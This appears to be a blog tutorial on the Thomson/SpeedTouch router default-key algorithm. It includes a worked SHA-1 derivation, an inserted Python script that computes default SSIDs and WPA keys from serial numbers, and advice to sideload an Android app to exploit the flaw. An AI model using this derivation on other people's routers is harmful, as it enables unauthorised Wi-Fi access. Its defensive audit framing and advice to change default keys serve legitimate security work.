In part 3 of the Hacking with Android series we look at the Thomson default key algorithm presented by the GNUCitizen team, which lets us calculate the default passwords of many Thomson routers. We then use an Android application named Thomson WPA Finder to exploit this vulnerability from an Android device.
In this method we have:
S/N -> hash -> default SSID and encryption key
which can be read as: a hash of the router’s serial number is generated, which is then used to derive both the default SSID and the default encryption key. This is just a high-level overview of the algorithm.
- Take as example: “CP0615JT109 (53)”
- Remove the CC and PP values (here “53” and “JT”): CP0615109
- Convert the “XXX” values (here “109”) to the hexadecimal of their ASCII codes: CP0615313039
- Process with SHA-1: 742da831d2b657fa53d347301ec610e1ebf8a3d0
- The last 3 bytes are converted to a 6-character string and appended to the word “SpeedTouch”, which becomes the default SSID: SpeedTouchF8A3D0
- The first 5 bytes are converted to a 10-character string, which becomes the default WEP/WPA key: 742DA831D2
My advice is: use WPA/WPA-2 rather than WEP and change the default encryption key now, to something STRONG!
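To check whether a router you administer is still on the derivable factory key, the steps above can be scripted. This is an added example, not code from the original post or from GNUCitizen; the serial layout in the regular expression is inferred from the example serial above, and `default_credentials` and `audit` are hypothetical names.

```python
import hashlib
import re

# Assumption: layout inferred from the page's example "CP0615JT109 (53)":
# "CP" + 4 digits kept as-is + 2 "PP" characters + 3 "XXX" characters + "(CC)".
SERIAL_RE = re.compile(
    r"^(CP[0-9]{4})([0-9A-Z]{2})([0-9A-Z]{3})\s*(?:\(([0-9A-Z]{2})\))?$"
)


def default_credentials(serial):
    """Return (default SSID, default key) derived from the label serial number."""
    match = SERIAL_RE.match(serial.strip().upper())
    if match is None:
        raise ValueError(f"unrecognised serial format: {serial!r}")
    prefix, _pp, xxx, _cc = match.groups()               # PP and CC are dropped
    xxx_hex = "".join(f"{ord(ch):02X}" for ch in xxx)    # "109" -> "313039"
    digest = hashlib.sha1((prefix + xxx_hex).encode("ascii")).hexdigest().upper()
    ssid = "SpeedTouch" + digest[-6:]                    # last 3 bytes of the hash
    key = digest[:10]                                    # first 5 bytes of the hash
    return ssid, key


def audit(serial, broadcast_ssid, configured_key):
    """List the findings for one router from your own inventory."""
    ssid, key = default_credentials(serial)
    findings = []
    if broadcast_ssid.strip().lower() == ssid.lower():
        findings.append("SSID is the factory default and reveals 3 bytes of the hash")
    if configured_key.strip().upper() == key:
        findings.append("key is the factory default derivable from the serial number")
    return findings


if __name__ == "__main__":
    # Constructed inventory: the page's example serial, once with factory
    # settings and once after the owner changed both SSID and key.
    print(default_credentials("CP0615JT109 (53)"))
    print(audit("CP0615JT109 (53)", "SpeedTouchF8A3D0", "742da831d2"))
    print(audit("CP0615JT109 (53)", "HomeNet", "a long unique passphrase"))
```

An empty list from `audit` means neither the SSID nor the key matches the factory values for that serial.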
To install it, download the .apk from the download link and install it as an unknown-source app from a file manager. After installation it will request a download; allow it and the app will be ready for use. There are many apps like this, but I find this one easy and fast, with no problems in all the years that I have used it.
Everything you are going to see is for educational purposes only, so operate carefully and on your own property. I take no responsibility for what happens to you if you act irresponsibly.
Device used: Xiaomi Hongmi 1S (Android 4.4)
Thank You For Watching.:)